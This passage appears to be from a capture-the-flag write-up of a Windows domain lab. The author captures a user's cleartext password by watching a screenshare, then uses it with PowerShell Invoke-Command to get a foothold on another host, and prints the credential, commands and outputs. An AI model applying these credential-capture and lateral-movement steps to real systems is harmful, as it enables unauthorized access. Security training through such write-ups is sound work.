imonks
In the course of assessment, the edavies user’s account has been compromised, establishing a PowerShell session to the Acute-PC01 host.
Subsequently, it was observed that there was an active interactive session under the same user, identified by differences in the logon time attribute. The decision was made to investigate the user’s activities using Metasploit’s screenshare module, which provided real-time access to their screen.
During the screenshare session, it was noted that the edavies user attempted to initiate a PowerShell session targeting the ATSSERVER host, using the imonks user’s credentials within the dc_manage configuration. While doing so, the edavies user inadvertently exposed the CLEARTEXT password associated with the imonks user’s account.
With knowledge of the imonks user’s credentials now at hand, there exists the potential for lateral movement within the target domain, posing security risks and allowing for further unauthorized actions.
Attempting to authenticate to the ATSSERVER host using the credential of the imonks user via the PSWA endpoint results in failure
Interestingly, it prompts the very same odd error message that was observed earlier while attempting to gain the initial foothold to the Acute-PC01 host as the edavies user
PS C:\Utils> $Cred = New-Object System.Management.Automation.PSCredential("ACUTE.LOCAL\imonks", (ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force))
PS C:\Utils> Enter-PSSession -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage
Enter-PSSession : The term 'Measure-Object' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ Enter-PSSession -ComputerName ATSSERVER -Credential $Cred -Configurat ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Measure-Object:String) [Enter-PSSession], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundExceptionLeveraging the existing PowerShell session as the edavies user, it still results in failure with the exact same error message; The term ‘Measure-Object’ is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
The issue likely is caused by Kerberos Double Hop
Invoke-Command
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {whoami}
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more
information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {whoami}
acute\imonksHowever, it can be worked around with the use of PowerShell’s Invoke-Command cmdlet
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {whoami}
acute\imonks
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {hostname}
ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ipconfig}
The term 'ipconfig.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check
the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (ipconfig.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVERInitial Foothold established to the ATSSERVER host as the imonks user via the PowerShell’s Invoke-Command cmdlet
However, it seems that there is a limited amount of commands that I can use under the dc_manage configuration